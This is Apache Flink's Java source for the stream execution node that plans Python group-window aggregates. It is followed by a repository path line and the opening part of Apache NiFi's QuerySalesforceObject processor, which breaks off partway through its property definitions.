/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.flink.table.planner.plan.nodes.exec.stream; import org.apache.flink.FlinkVersion; import org.apache.flink.api.dag.Transformation; import org.apache.flink.api.java.tuple.Tuple2; import org.apache.flink.configuration.Configuration; import org.apache.flink.configuration.ReadableConfig; import org.apache.flink.core.memory.ManagedMemoryUseCase; import org.apache.flink.streaming.api.operators.OneInputStreamOperator; import org.apache.flink.streaming.api.transformations.OneInputTransformation; import org.apache.flink.table.api.TableException; import org.apache.flink.table.connector.Projection; import org.apache.flink.table.data.RowData; import org.apache.flink.table.expressions.FieldReferenceExpression; import org.apache.flink.table.expressions.ValueLiteralExpression; import org.apache.flink.table.functions.python.PythonAggregateFunctionInfo; import org.apache.flink.table.functions.python.PythonFunctionInfo; import org.apache.flink.table.functions.python.PythonFunctionKind; import org.apache.flink.table.planner.codegen.CodeGeneratorContext; import org.apache.flink.table.planner.codegen.ProjectionCodeGenerator; import org.apache.flink.table.planner.delegation.PlannerBase; import org.apache.flink.table.planner.plan.logical.LogicalWindow; import org.apache.flink.table.planner.plan.logical.SessionGroupWindow; import org.apache.flink.table.planner.plan.logical.SlidingGroupWindow; import org.apache.flink.table.planner.plan.logical.TumblingGroupWindow; import org.apache.flink.table.planner.plan.nodes.exec.ExecEdge; import org.apache.flink.table.planner.plan.nodes.exec.ExecNode; import org.apache.flink.table.planner.plan.nodes.exec.ExecNodeConfig; import org.apache.flink.table.planner.plan.nodes.exec.ExecNodeContext; import org.apache.flink.table.planner.plan.nodes.exec.ExecNodeMetadata; import org.apache.flink.table.planner.plan.nodes.exec.InputProperty; import org.apache.flink.table.planner.plan.nodes.exec.utils.CommonPythonUtil; import org.apache.flink.table.planner.plan.nodes.exec.utils.ExecNodeUtil; import org.apache.flink.table.planner.plan.utils.AggregateInfoList; import org.apache.flink.table.planner.plan.utils.AggregateUtil; import org.apache.flink.table.planner.plan.utils.KeySelectorUtil; import org.apache.flink.table.planner.plan.utils.PythonUtil; import org.apache.flink.table.planner.plan.utils.WindowEmitStrategy; import org.apache.flink.table.planner.utils.JavaScalaConversionUtil; import org.apache.flink.table.planner.utils.TableConfigUtils; import org.apache.flink.table.runtime.dataview.DataViewSpec; import org.apache.flink.table.runtime.generated.GeneratedProjection; import org.apache.flink.table.runtime.groupwindow.NamedWindowProperty; import org.apache.flink.table.runtime.keyselector.RowDataKeySelector; import org.apache.flink.table.runtime.operators.window.groupwindow.assigners.CountSlidingWindowAssigner; import org.apache.flink.table.runtime.operators.window.groupwindow.assigners.CountTumblingWindowAssigner; import org.apache.flink.table.runtime.operators.window.groupwindow.assigners.GroupWindowAssigner; import org.apache.flink.table.runtime.operators.window.groupwindow.assigners.SessionWindowAssigner; import org.apache.flink.table.runtime.operators.window.groupwindow.assigners.SlidingWindowAssigner; import org.apache.flink.table.runtime.operators.window.groupwindow.assigners.TumblingWindowAssigner; import org.apache.flink.table.runtime.operators.window.groupwindow.triggers.ElementTriggers; import org.apache.flink.table.runtime.operators.window.groupwindow.triggers.EventTimeTriggers; import org.apache.flink.table.runtime.operators.window.groupwindow.triggers.ProcessingTimeTriggers; import org.apache.flink.table.runtime.operators.window.groupwindow.triggers.Trigger; import org.apache.flink.table.runtime.typeutils.InternalTypeInfo; import org.apache.flink.table.runtime.util.TimeWindowUtil; import org.apache.flink.table.types.logical.RowType; import org.apache.flink.shaded.jackson2.com.fasterxml.jackson.annotation.JsonCreator; import org.apache.flink.shaded.jackson2.com.fasterxml.jackson.annotation.JsonProperty; import org.apache.calcite.rel.core.AggregateCall; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import java.lang.reflect.Constructor; import java.lang.reflect.InvocationTargetException; import java.lang.reflect.Method; import java.time.ZoneId; import java.util.Arrays; import java.util.Collections; import java.util.List; import static org.apache.flink.table.planner.plan.utils.AggregateUtil.hasRowIntervalType; import static org.apache.flink.table.planner.plan.utils.AggregateUtil.hasTimeIntervalType; import static org.apache.flink.table.planner.plan.utils.AggregateUtil.isProctimeAttribute; import static org.apache.flink.table.planner.plan.utils.AggregateUtil.isRowtimeAttribute; import static org.apache.flink.table.planner.plan.utils.AggregateUtil.toDuration; import static org.apache.flink.table.planner.plan.utils.AggregateUtil.toLong; import static org.apache.flink.table.planner.plan.utils.AggregateUtil.transformToStreamAggregateInfoList; import static org.apache.flink.util.Preconditions.checkArgument; import static org.apache.flink.util.Preconditions.checkNotNull; /** Stream {@link ExecNode} for group widow aggregate (Python user defined aggregate function). */ @ExecNodeMetadata( name = "stream-exec-python-group-window-aggregate", version = 1, producedTransformations = StreamExecPythonGroupWindowAggregate.PYTHON_GROUP_WINDOW_AGGREGATE_TRANSFORMATION, minPlanVersion = FlinkVersion.v1_16, minStateVersion = FlinkVersion.v1_16) public class StreamExecPythonGroupWindowAggregate extends StreamExecAggregateBase { private static final Logger LOGGER = LoggerFactory.getLogger(StreamExecPythonGroupWindowAggregate.class); public static final String PYTHON_GROUP_WINDOW_AGGREGATE_TRANSFORMATION = "python-group-window-aggregate"; public static final String FIELD_NAME_WINDOW = "window"; public static final String FIELD_NAME_NAMED_WINDOW_PROPERTIES = "namedWindowProperties"; private static final String ARROW_STREAM_PYTHON_GROUP_WINDOW_AGGREGATE_FUNCTION_OPERATOR_NAME = "org.apache.flink.table.runtime.operators.python.aggregate.arrow.stream." + "StreamArrowPythonGroupWindowAggregateFunctionOperator"; private static final String GENERAL_STREAM_PYTHON_GROUP_WINDOW_AGGREGATE_FUNCTION_OPERATOR_NAME = "org.apache.flink.table.runtime.operators.python.aggregate." + "PythonStreamGroupWindowAggregateOperator"; private static final String GENERAL_STREAM_PYTHON_CREATE_TUMBLING_GROUP_WINDOW_METHOD = "createTumblingGroupWindowAggregateOperator"; private static final String GENERAL_STREAM_PYTHON_CREATE_SLIDING_GROUP_WINDOW_METHOD = "createSlidingGroupWindowAggregateOperator"; private static final String GENERAL_STREAM_PYTHON_CREATE_SESSION_GROUP_WINDOW_METHOD = "createSessionGroupWindowAggregateOperator"; @JsonProperty(FIELD_NAME_GROUPING) private final int[] grouping; @JsonProperty(FIELD_NAME_AGG_CALLS) private final AggregateCall[] aggCalls; @JsonProperty(FIELD_NAME_WINDOW) private final LogicalWindow window; @JsonProperty(FIELD_NAME_NAMED_WINDOW_PROPERTIES) private final NamedWindowProperty[] namedWindowProperties; @JsonProperty(FIELD_NAME_NEED_RETRACTION) private final boolean needRetraction; @JsonProperty(FIELD_NAME_GENERATE_UPDATE_BEFORE) private final boolean generateUpdateBefore; public StreamExecPythonGroupWindowAggregate( ReadableConfig tableConfig, int[] grouping, AggregateCall[] aggCalls, LogicalWindow window, NamedWindowProperty[] namedWindowProperties, boolean generateUpdateBefore, boolean needRetraction, InputProperty inputProperty, RowType outputType, String description) { this( ExecNodeContext.newNodeId(), ExecNodeContext.newContext(StreamExecPythonGroupWindowAggregate.class), ExecNodeContext.newPersistedConfig( StreamExecPythonGroupWindowAggregate.class, tableConfig), grouping, aggCalls, window, namedWindowProperties, generateUpdateBefore, needRetraction, Collections.singletonList(inputProperty), outputType, description); } @JsonCreator public StreamExecPythonGroupWindowAggregate( @JsonProperty(FIELD_NAME_ID) int id, @JsonProperty(FIELD_NAME_TYPE) ExecNodeContext context, @JsonProperty(FIELD_NAME_CONFIGURATION) ReadableConfig persistedConfig, @JsonProperty(FIELD_NAME_GROUPING) int[] grouping, @JsonProperty(FIELD_NAME_AGG_CALLS) AggregateCall[] aggCalls, @JsonProperty(FIELD_NAME_WINDOW) LogicalWindow window, @JsonProperty(FIELD_NAME_NAMED_WINDOW_PROPERTIES) NamedWindowProperty[] namedWindowProperties, @JsonProperty(FIELD_NAME_GENERATE_UPDATE_BEFORE) boolean generateUpdateBefore, @JsonProperty(FIELD_NAME_NEED_RETRACTION) boolean needRetraction, @JsonProperty(FIELD_NAME_INPUT_PROPERTIES) List<InputProperty> inputProperties, @JsonProperty(FIELD_NAME_OUTPUT_TYPE) RowType outputType, @JsonProperty(FIELD_NAME_DESCRIPTION) String description) { super(id, context, persistedConfig, inputProperties, outputType, description); checkArgument(inputProperties.size() == 1); this.grouping = checkNotNull(grouping); this.aggCalls = checkNotNull(aggCalls); this.window = checkNotNull(window); this.namedWindowProperties = checkNotNull(namedWindowProperties); this.generateUpdateBefore = generateUpdateBefore; this.needRetraction = needRetraction; } @SuppressWarnings("unchecked") @Override protected Transformation<RowData> translateToPlanInternal( PlannerBase planner, ExecNodeConfig config) { final boolean isCountWindow; if (window instanceof TumblingGroupWindow) { isCountWindow = hasRowIntervalType(((TumblingGroupWindow) window).size()); } else if (window instanceof SlidingGroupWindow) { isCountWindow = hasRowIntervalType(((SlidingGroupWindow) window).size()); } else { isCountWindow = false; } if (isCountWindow && grouping.length > 0 && config.getStateRetentionTime() < 0) { LOGGER.warn( "No state retention interval configured for a query which accumulates state." + " Please provide a query configuration with valid retention interval to" + " prevent excessive state size. You may specify a retention time of 0 to" + " not clean up the state."); } final ExecEdge inputEdge = getInputEdges().get(0); final Transformation<RowData> inputTransform = (Transformation<RowData>) inputEdge.translateToPlan(planner); final RowType inputRowType = (RowType) inputEdge.getOutputType(); final RowType outputRowType = InternalTypeInfo.of(getOutputType()).toRowType(); final int inputTimeFieldIndex; if (isRowtimeAttribute(window.timeAttribute())) { inputTimeFieldIndex = window.timeAttribute().getFieldIndex(); if (inputTimeFieldIndex < 0) { throw new TableException( "Group window must defined on a time attribute, " + "but the time attribute can't be found.\n" + "This should never happen. Please file an issue."); } } else { inputTimeFieldIndex = -1; } final ZoneId shiftTimeZone = TimeWindowUtil.getShiftTimeZone( window.timeAttribute().getOutputDataType().getLogicalType(), TableConfigUtils.getLocalTimeZone(config)); Tuple2<GroupWindowAssigner<?>, Trigger<?>> windowAssignerAndTrigger = generateWindowAssignerAndTrigger(); GroupWindowAssigner<?> windowAssigner = windowAssignerAndTrigger.f0; Trigger<?> trigger = windowAssignerAndTrigger.f1; final Configuration pythonConfig = CommonPythonUtil.extractPythonConfiguration( planner.getTableConfig(), planner.getFlinkContext().getClassLoader()); final ExecNodeConfig pythonNodeConfig = ExecNodeConfig.ofNodeConfig(pythonConfig, config.isCompiled()); boolean isGeneralPythonUDAF = Arrays.stream(aggCalls) .anyMatch(x -> PythonUtil.isPythonAggregate(x, PythonFunctionKind.GENERAL)); OneInputTransformation<RowData, RowData> transform; WindowEmitStrategy emitStrategy = WindowEmitStrategy.apply(config, window); if (isGeneralPythonUDAF) { final boolean[] aggCallNeedRetractions = new boolean[aggCalls.length]; Arrays.fill(aggCallNeedRetractions, needRetraction); final AggregateInfoList aggInfoList = transformToStreamAggregateInfoList( planner.getTypeFactory(), inputRowType, JavaScalaConversionUtil.toScala(Arrays.asList(aggCalls)), aggCallNeedRetractions, needRetraction, true, true); transform = createGeneralPythonStreamWindowGroupOneInputTransformation( inputTransform, inputRowType, outputRowType, inputTimeFieldIndex, windowAssigner, aggInfoList, emitStrategy.getAllowLateness(), pythonConfig, pythonNodeConfig, planner.getFlinkContext().getClassLoader(), shiftTimeZone); } else { transform = createPandasPythonStreamWindowGroupOneInputTransformation( inputTransform, inputRowType, outputRowType, inputTimeFieldIndex, windowAssigner, trigger, emitStrategy.getAllowLateness(), pythonConfig, pythonNodeConfig, planner.getFlinkContext().getClassLoader(), shiftTimeZone); } if (CommonPythonUtil.isPythonWorkerUsingManagedMemory( pythonConfig, planner.getFlinkContext().getClassLoader())) { transform.declareManagedMemoryUseCaseAtSlotScope(ManagedMemoryUseCase.PYTHON); } // set KeyType and Selector for state final RowDataKeySelector selector = KeySelectorUtil.getRowDataSelector( planner.getFlinkContext().getClassLoader(), grouping, InternalTypeInfo.of(inputRowType)); transform.setStateKeySelector(selector); transform.setStateKeyType(selector.getProducedType()); return transform; } private Tuple2<GroupWindowAssigner<?>, Trigger<?>> generateWindowAssignerAndTrigger() { GroupWindowAssigner<?> windowAssiger; Trigger<?> trigger; if (window instanceof TumblingGroupWindow) { TumblingGroupWindow tumblingWindow = (TumblingGroupWindow) window; FieldReferenceExpression timeField = tumblingWindow.timeField(); ValueLiteralExpression size = tumblingWindow.size(); if (isProctimeAttribute(timeField) && hasTimeIntervalType(size)) { windowAssiger = TumblingWindowAssigner.of(toDuration(size)).withProcessingTime(); trigger = ProcessingTimeTriggers.afterEndOfWindow(); } else if (isRowtimeAttribute(timeField) && hasTimeIntervalType(size)) { windowAssiger = TumblingWindowAssigner.of(toDuration(size)).withEventTime(); trigger = EventTimeTriggers.afterEndOfWindow(); } else if (isProctimeAttribute(timeField) && hasRowIntervalType(size)) { windowAssiger = CountTumblingWindowAssigner.of(toLong(size)); trigger = ElementTriggers.count(toLong(size)); } else { // TODO: EventTimeTumblingGroupWindow should sort the stream on event time // before applying the windowing logic. Otherwise, this would be the same as a // ProcessingTimeTumblingGroupWindow throw new UnsupportedOperationException( "Event-time grouping windows on row intervals are currently not supported."); } } else if (window instanceof SlidingGroupWindow) { SlidingGroupWindow slidingWindow = (SlidingGroupWindow) window; FieldReferenceExpression timeField = slidingWindow.timeField(); ValueLiteralExpression size = slidingWindow.size(); ValueLiteralExpression slide = slidingWindow.slide(); if (isProctimeAttribute(timeField) && hasTimeIntervalType(size)) { windowAssiger = SlidingWindowAssigner.of(toDuration(size), toDuration(slide)) .withProcessingTime(); trigger = ProcessingTimeTriggers.afterEndOfWindow(); } else if (isRowtimeAttribute(timeField) && hasTimeIntervalType(size)) { windowAssiger = SlidingWindowAssigner.of(toDuration(size), toDuration(slide)); trigger = EventTimeTriggers.afterEndOfWindow(); } else if (isProctimeAttribute(timeField) && hasRowIntervalType(size)) { windowAssiger = CountSlidingWindowAssigner.of(toLong(size), toLong(slide)); trigger = ElementTriggers.count(toLong(size)); } else { // TODO: EventTimeTumblingGroupWindow should sort the stream on event time // before applying the windowing logic. Otherwise, this would be the same as a // ProcessingTimeTumblingGroupWindow throw new UnsupportedOperationException( "Event-time grouping windows on row intervals are currently not supported."); } } else if (window instanceof SessionGroupWindow) { SessionGroupWindow sessionWindow = (SessionGroupWindow) window; FieldReferenceExpression timeField = sessionWindow.timeField(); ValueLiteralExpression gap = sessionWindow.gap(); if (isProctimeAttribute(timeField)) { windowAssiger = SessionWindowAssigner.withGap(toDuration(gap)); trigger = ProcessingTimeTriggers.afterEndOfWindow(); } else if (isRowtimeAttribute(timeField)) { windowAssiger = SessionWindowAssigner.withGap(toDuration(gap)); trigger = EventTimeTriggers.afterEndOfWindow(); } else { throw new UnsupportedOperationException("This should not happen."); } } else { throw new TableException("Unsupported window: " + window.toString()); } return Tuple2.of(windowAssiger, trigger); } private OneInputTransformation<RowData, RowData> createPandasPythonStreamWindowGroupOneInputTransformation( Transformation<RowData> inputTransform, RowType inputRowType, RowType outputRowType, int inputTimeFieldIndex, GroupWindowAssigner<?> windowAssigner, Trigger<?> trigger, long allowance, Configuration pythonConfig, ExecNodeConfig config, ClassLoader classLoader, ZoneId shiftTimeZone) { Tuple2<int[], PythonFunctionInfo[]> aggInfos = CommonPythonUtil.extractPythonAggregateFunctionInfosFromAggregateCall(aggCalls); int[] pythonUdafInputOffsets = aggInfos.f0; PythonFunctionInfo[] pythonFunctionInfos = aggInfos.f1; OneInputStreamOperator<RowData, RowData> pythonOperator = getPandasPythonStreamGroupWindowAggregateFunctionOperator( config, classLoader, pythonConfig, inputRowType, outputRowType, windowAssigner, trigger, allowance, inputTimeFieldIndex, pythonUdafInputOffsets, pythonFunctionInfos, shiftTimeZone); return ExecNodeUtil.createOneInputTransformation( inputTransform, createTransformationMeta(PYTHON_GROUP_WINDOW_AGGREGATE_TRANSFORMATION, config), pythonOperator, InternalTypeInfo.of(outputRowType), inputTransform.getParallelism(), false); } private OneInputTransformation<RowData, RowData> createGeneralPythonStreamWindowGroupOneInputTransformation( Transformation<RowData> inputTransform, RowType inputRowType, RowType outputRowType, int inputTimeFieldIndex, GroupWindowAssigner<?> windowAssigner, AggregateInfoList aggInfoList, long allowance, Configuration pythonConfig, ExecNodeConfig pythonNodeConfig, ClassLoader classLoader, ZoneId shiftTimeZone) { final int inputCountIndex = aggInfoList.getIndexOfCountStar(); final boolean countStarInserted = aggInfoList.countStarInserted(); final Tuple2<PythonAggregateFunctionInfo[], DataViewSpec[][]> aggInfosAndDataViewSpecs = CommonPythonUtil.extractPythonAggregateFunctionInfos(aggInfoList, aggCalls); PythonAggregateFunctionInfo[] pythonFunctionInfos = aggInfosAndDataViewSpecs.f0; DataViewSpec[][] dataViewSpecs = aggInfosAndDataViewSpecs.f1; OneInputStreamOperator<RowData, RowData> pythonOperator = getGeneralPythonStreamGroupWindowAggregateFunctionOperator( pythonConfig, classLoader, inputRowType, outputRowType, windowAssigner, pythonFunctionInfos, dataViewSpecs, inputTimeFieldIndex, inputCountIndex, generateUpdateBefore, countStarInserted, allowance, shiftTimeZone); return ExecNodeUtil.createOneInputTransformation( inputTransform, createTransformationMeta( PYTHON_GROUP_WINDOW_AGGREGATE_TRANSFORMATION, pythonNodeConfig), pythonOperator, InternalTypeInfo.of(outputRowType), inputTransform.getParallelism(), false); } @SuppressWarnings({"unchecked", "rawtypes"}) private OneInputStreamOperator<RowData, RowData> getPandasPythonStreamGroupWindowAggregateFunctionOperator( ExecNodeConfig config, ClassLoader classLoader, Configuration pythonConfig, RowType inputRowType, RowType outputRowType, GroupWindowAssigner<?> windowAssigner, Trigger<?> trigger, long allowance, int inputTimeFieldIndex, int[] udafInputOffsets, PythonFunctionInfo[] pythonFunctionInfos, ZoneId shiftTimeZone) { Class clazz = CommonPythonUtil.loadClass( ARROW_STREAM_PYTHON_GROUP_WINDOW_AGGREGATE_FUNCTION_OPERATOR_NAME, classLoader); RowType userDefinedFunctionInputType = (RowType) Projection.of(udafInputOffsets).project(inputRowType); RowType userDefinedFunctionOutputType = (RowType) Projection.range( grouping.length, outputRowType.getFieldCount() - namedWindowProperties.length) .project(outputRowType); try { Constructor<OneInputStreamOperator<RowData, RowData>> ctor = clazz.getConstructor( Configuration.class, PythonFunctionInfo[].class, RowType.class, RowType.class, RowType.class, int.class, GroupWindowAssigner.class, Trigger.class, long.class, NamedWindowProperty[].class, ZoneId.class, GeneratedProjection.class); return ctor.newInstance( pythonConfig, pythonFunctionInfos, inputRowType, userDefinedFunctionInputType, userDefinedFunctionOutputType, inputTimeFieldIndex, windowAssigner, trigger, allowance, namedWindowProperties, shiftTimeZone, ProjectionCodeGenerator.generateProjection( new CodeGeneratorContext(config, classLoader), "UdafInputProjection", inputRowType, userDefinedFunctionInputType, udafInputOffsets)); } catch (NoSuchMethodException | IllegalAccessException | InstantiationException | InvocationTargetException e) { throw new TableException( "Python StreamArrowPythonGroupWindowAggregateFunctionOperator constructed failed.", e); } } @SuppressWarnings({"unchecked", "rawtypes"}) private OneInputStreamOperator<RowData, RowData> getGeneralPythonStreamGroupWindowAggregateFunctionOperator( Configuration config, ClassLoader classLoader, RowType inputType, RowType outputType, GroupWindowAssigner<?> windowAssigner, PythonAggregateFunctionInfo[] aggregateFunctions, DataViewSpec[][] dataViewSpecs, int inputTimeFieldIndex, int indexOfCountStar, boolean generateUpdateBefore, boolean countStarInserted, long allowance, ZoneId shiftTimeZone) { Class clazz = CommonPythonUtil.loadClass( GENERAL_STREAM_PYTHON_GROUP_WINDOW_AGGREGATE_FUNCTION_OPERATOR_NAME, classLoader); boolean isRowTime = AggregateUtil.isRowtimeAttribute(window.timeAttribute()); try { if (window instanceof TumblingGroupWindow) { ValueLiteralExpression size = ((TumblingGroupWindow) window).size(); Method create = clazz.getMethod( GENERAL_STREAM_PYTHON_CREATE_TUMBLING_GROUP_WINDOW_METHOD, Configuration.class, RowType.class, RowType.class, PythonAggregateFunctionInfo[].class, DataViewSpec[][].class, int[].class, int.class, boolean.class, boolean.class, int.class, GroupWindowAssigner.class, boolean.class, boolean.class, long.class, long.class, NamedWindowProperty[].class, ZoneId.class); return (OneInputStreamOperator<RowData, RowData>) create.invoke( null, config, inputType, outputType, aggregateFunctions, dataViewSpecs, grouping, indexOfCountStar, generateUpdateBefore, countStarInserted, inputTimeFieldIndex, windowAssigner, isRowTime, AggregateUtil.hasTimeIntervalType(size), AggregateUtil.toDuration(size).toMillis(), allowance, namedWindowProperties, shiftTimeZone); } else if (window instanceof SlidingGroupWindow) { ValueLiteralExpression size = ((SlidingGroupWindow) window).size(); ValueLiteralExpression slide = ((SlidingGroupWindow) window).slide(); Method create = clazz.getMethod( GENERAL_STREAM_PYTHON_CREATE_SLIDING_GROUP_WINDOW_METHOD, Configuration.class, RowType.class, RowType.class, PythonAggregateFunctionInfo[].class, DataViewSpec[][].class, int[].class, int.class, boolean.class, boolean.class, int.class, GroupWindowAssigner.class, boolean.class, boolean.class, long.class, long.class, long.class, NamedWindowProperty[].class, ZoneId.class); return (OneInputStreamOperator<RowData, RowData>) create.invoke( null, config, inputType, outputType, aggregateFunctions, dataViewSpecs, grouping, indexOfCountStar, generateUpdateBefore, countStarInserted, inputTimeFieldIndex, windowAssigner, isRowTime, AggregateUtil.hasTimeIntervalType(size), AggregateUtil.toDuration(size).toMillis(), AggregateUtil.toDuration(slide).toMillis(), allowance, namedWindowProperties, shiftTimeZone); } else if (window instanceof SessionGroupWindow) { ValueLiteralExpression gap = ((SessionGroupWindow) window).gap(); Method create = clazz.getMethod( GENERAL_STREAM_PYTHON_CREATE_SESSION_GROUP_WINDOW_METHOD, Configuration.class, RowType.class, RowType.class, PythonAggregateFunctionInfo[].class, DataViewSpec[][].class, int[].class, int.class, boolean.class, boolean.class, int.class, GroupWindowAssigner.class, boolean.class, long.class, long.class, NamedWindowProperty[].class, ZoneId.class); return (OneInputStreamOperator<RowData, RowData>) create.invoke( null, config, inputType, outputType, aggregateFunctions, dataViewSpecs, grouping, indexOfCountStar, generateUpdateBefore, countStarInserted, inputTimeFieldIndex, windowAssigner, isRowTime, AggregateUtil.toDuration(gap).toMillis(), allowance, namedWindowProperties, shiftTimeZone); } } catch (NoSuchMethodException | IllegalAccessException | InvocationTargetException e) { throw new TableException( "Python PythonStreamGroupWindowAggregateOperator constructed failed.", e); } throw new RuntimeException(String.format("Unsupported LogicWindow Type %s", window)); } }
apache/nifi
35,992
nifi-extension-bundles/nifi-salesforce-bundle/nifi-salesforce-processors/src/main/java/org/apache/nifi/processors/salesforce/QuerySalesforceObject.java
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.nifi.processors.salesforce; import com.fasterxml.jackson.core.JsonEncoding; import com.fasterxml.jackson.core.JsonFactory; import com.fasterxml.jackson.core.JsonGenerator; import com.fasterxml.jackson.core.JsonParser; import com.fasterxml.jackson.core.JsonToken; import com.fasterxml.jackson.databind.ObjectMapper; import org.apache.camel.component.salesforce.api.dto.SObjectDescription; import org.apache.camel.component.salesforce.api.dto.SObjectField; import org.apache.nifi.annotation.behavior.InputRequirement; import org.apache.nifi.annotation.behavior.InputRequirement.Requirement; import org.apache.nifi.annotation.behavior.Stateful; import org.apache.nifi.annotation.behavior.TriggerSerially; import org.apache.nifi.annotation.behavior.WritesAttribute; import org.apache.nifi.annotation.behavior.WritesAttributes; import org.apache.nifi.annotation.configuration.DefaultSchedule; import org.apache.nifi.annotation.documentation.CapabilityDescription; import org.apache.nifi.annotation.documentation.SeeAlso; import org.apache.nifi.annotation.documentation.Tags; import org.apache.nifi.annotation.lifecycle.OnScheduled; import org.apache.nifi.components.AllowableValue; import org.apache.nifi.components.PropertyDescriptor; import org.apache.nifi.components.ValidationContext; import org.apache.nifi.components.ValidationResult; import org.apache.nifi.components.state.Scope; import org.apache.nifi.components.state.StateMap; import org.apache.nifi.expression.ExpressionLanguageScope; import org.apache.nifi.flowfile.FlowFile; import org.apache.nifi.flowfile.attributes.CoreAttributes; import org.apache.nifi.json.JsonParserFactory; import org.apache.nifi.json.JsonTreeRowRecordReader; import org.apache.nifi.json.SchemaApplicationStrategy; import org.apache.nifi.json.StartingFieldStrategy; import org.apache.nifi.oauth2.OAuth2AccessTokenProvider; import org.apache.nifi.processor.AbstractProcessor; import org.apache.nifi.processor.ProcessContext; import org.apache.nifi.processor.ProcessSession; import org.apache.nifi.processor.Relationship; import org.apache.nifi.processor.exception.ProcessException; import org.apache.nifi.processor.io.OutputStreamCallback; import org.apache.nifi.processor.util.StandardValidators; import org.apache.nifi.processors.salesforce.rest.SalesforceConfiguration; import org.apache.nifi.processors.salesforce.rest.SalesforceRestClient; import org.apache.nifi.processors.salesforce.schema.SalesforceSchemaHolder; import org.apache.nifi.processors.salesforce.schema.SalesforceToRecordSchemaConverter; import org.apache.nifi.processors.salesforce.util.IncrementalContext; import org.apache.nifi.processors.salesforce.util.SalesforceQueryBuilder; import org.apache.nifi.processors.salesforce.validator.SalesforceAgeValidator; import org.apache.nifi.scheduling.SchedulingStrategy; import org.apache.nifi.schema.access.SchemaNotFoundException; import org.apache.nifi.serialization.MalformedRecordException; import org.apache.nifi.serialization.RecordSetWriter; import org.apache.nifi.serialization.RecordSetWriterFactory; import org.apache.nifi.serialization.SimpleRecordSchema; import org.apache.nifi.serialization.WriteResult; import org.apache.nifi.serialization.record.Record; import org.apache.nifi.serialization.record.RecordField; import org.apache.nifi.serialization.record.RecordFieldType; import org.apache.nifi.serialization.record.RecordSchema; import org.apache.nifi.util.StringUtils; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import java.io.UncheckedIOException; import java.util.ArrayList; import java.util.Arrays; import java.util.Collection; import java.util.Collections; import java.util.HashMap; import java.util.List; import java.util.Map; import java.util.Optional; import java.util.Set; import java.util.concurrent.TimeUnit; import java.util.concurrent.atomic.AtomicBoolean; import java.util.concurrent.atomic.AtomicInteger; import java.util.concurrent.atomic.AtomicReference; import java.util.function.BiPredicate; import java.util.stream.Collectors; import static org.apache.nifi.processors.salesforce.util.CommonSalesforceProperties.API_VERSION; import static org.apache.nifi.processors.salesforce.util.CommonSalesforceProperties.READ_TIMEOUT; import static org.apache.nifi.processors.salesforce.util.CommonSalesforceProperties.SALESFORCE_INSTANCE_URL; import static org.apache.nifi.processors.salesforce.util.CommonSalesforceProperties.TOKEN_PROVIDER; @TriggerSerially @InputRequirement(Requirement.INPUT_ALLOWED) @Tags({"salesforce", "sobject", "soql", "query"}) @CapabilityDescription("Retrieves records from a Salesforce sObject. Users can add arbitrary filter conditions by setting the 'Custom WHERE Condition' property." + " The processor can also run a custom query, although record processing is not supported in that case." + " Supports incremental retrieval: users can define a field in the 'Age Field' property that will be used to determine when the record was created." + " When this property is set the processor will retrieve new records. Incremental loading and record-based processing are only supported in property-based queries." + " It's also possible to define an initial cutoff value for the age, filtering out all older records" + " even for the first run. In case of 'Property Based Query' this processor should run on the Primary Node only." + " FlowFile attribute 'record.count' indicates how many records were retrieved and written to the output." + " The processor can accept an optional input FlowFile and reference the FlowFile attributes in the query." + " When 'Include Deleted Records' is true, the processor will include deleted records (soft-deletes) in the results by using the 'queryAll' API." + " The 'IsDeleted' field will be automatically included in the results when querying deleted records.") @Stateful(scopes = Scope.CLUSTER, description = "When 'Age Field' is set, after performing a query the time of execution is stored. Subsequent queries will be augmented" + " with an additional condition so that only records that are newer than the stored execution time (adjusted with the optional value of 'Age Delay') will be retrieved." + " State is stored across the cluster so that this Processor can be run on Primary Node only and if a new Primary Node is selected," + " the new node can pick up where the previous node left off, without duplicating the data.") @WritesAttributes({ @WritesAttribute(attribute = "mime.type", description = "Sets the mime.type attribute to the MIME Type specified by the Record Writer."), @WritesAttribute(attribute = "record.count", description = "Sets the number of records in the FlowFile."), @WritesAttribute(attribute = "total.record.count", description = "Sets the total number of records in the FlowFile.") }) @DefaultSchedule(strategy = SchedulingStrategy.TIMER_DRIVEN, period = "1 min") @SeeAlso(PutSalesforceObject.class) public class QuerySalesforceObject extends AbstractProcessor { static final AllowableValue PROPERTY_BASED_QUERY = new AllowableValue("property-based-query", "Property Based Query", "Provide query by properties."); static final AllowableValue CUSTOM_QUERY = new AllowableValue("custom-query", "Custom Query", "Provide custom SOQL query."); static final PropertyDescriptor QUERY_TYPE = new PropertyDescriptor.Builder() .name("query-type") .displayName("Query Type") .description("Choose to provide the query by parameters or a full custom query.") .required(true) .defaultValue(PROPERTY_BASED_QUERY.getValue()) .allowableValues(PROPERTY_BASED_QUERY, CUSTOM_QUERY) .build(); static final PropertyDescriptor CUSTOM_SOQL_QUERY = new PropertyDescriptor.Builder() .name("custom-soql-query") .displayName("Custom SOQL Query") .description("Specify the SOQL query to run.") .required(true) .addValidator(StandardValidators.NON_BLANK_VALIDATOR) .dependsOn(QUERY_TYPE, CUSTOM_QUERY) .expressionLanguageSupported(ExpressionLanguageScope.FLOWFILE_ATTRIBUTES) .build(); static final PropertyDescriptor SOBJECT_NAME = new PropertyDescriptor.Builder() .name("sobject-name") .displayName("sObject Name") .description("The Salesforce sObject to be queried") .required(true) 